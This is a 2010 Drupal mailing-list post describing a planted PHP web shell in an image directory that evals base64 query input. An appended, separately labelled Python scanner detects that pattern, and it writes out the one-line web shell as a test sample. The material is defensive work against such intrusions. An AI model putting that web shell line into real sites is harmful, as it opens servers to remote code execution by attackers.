[development] Fully patched site hacked and cloaked
Jeff Greenberg
jeff at ayendesigns.com
Wed Jan 27 18:57:12 UTC 2010
On 1/27/2010 12:43 PM, Matt Chapman wrote:
> Also FTR, I've seen a similar (but not quite identical) sort of attack
> on an xcart installation on another host.
>
I've seen the osc / xcart attack. They created a subdirectory in the
image directory... /yahoo ... and put an index.php file in it. The file
checked the query string for a value. If it wasn't there, it would
simply display an osc heading. If the value was there, it grabbed a
base64 value from the query string, decoded it, and called eval against it.
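
Added example, not part of the original post: a defender-side scan for the pattern described above, a PHP file planted under an image directory that calls eval on base64-decoded request input. The regex heuristics, the parameter name `v`, and every sample file other than yahoo/index.php are constructed assumptions.

```python
import os
import re
import tempfile

# Extensions a PHP-enabled web server commonly executes.
PHP_EXT = (".php", ".phtml", ".php5")
# Heuristics (assumptions) for the described pattern: request input, base64, eval.
REQUEST_INPUT = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")
BASE64_DECODE = re.compile(rb"\bbase64_decode\s*\(", re.I)
EVAL_CALL = re.compile(rb"\beval\s*\(", re.I)


def scan_media_dir(root):
    """Return sorted [(relative_path, [reasons])] for every PHP file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                body = fh.read(1_000_000)  # cap how much of each file is read
            # Any script in an image/upload directory is worth a look on its own.
            reasons = ["php file in media directory"]
            if EVAL_CALL.search(body) and BASE64_DECODE.search(body):
                reasons.append("eval with base64_decode")
                if REQUEST_INPUT.search(body):
                    reasons.append("decodes request input")
            findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def demo():
    """Build a constructed image tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "yahoo"))
        # Constructed sample matching the description; it is only read, never run.
        with open(os.path.join(root, "yahoo", "index.php"), "wb") as fh:
            fh.write(b"<?php if (isset($_GET['v'])) { eval(base64_decode($_GET['v'])); } ?>")
        with open(os.path.join(root, "logo.php"), "wb") as fh:
            fh.write(b"<?php header('Location: /'); ?>")
        with open(os.path.join(root, "banner.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff\xe0 constructed jpeg header")
        return scan_media_dir(root)


if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", "; ".join(reasons))
```

Pointing `scan_media_dir` at a real image or upload root works the same way; directories that should hold only static files are also candidates for disabling PHP execution in the web server configuration.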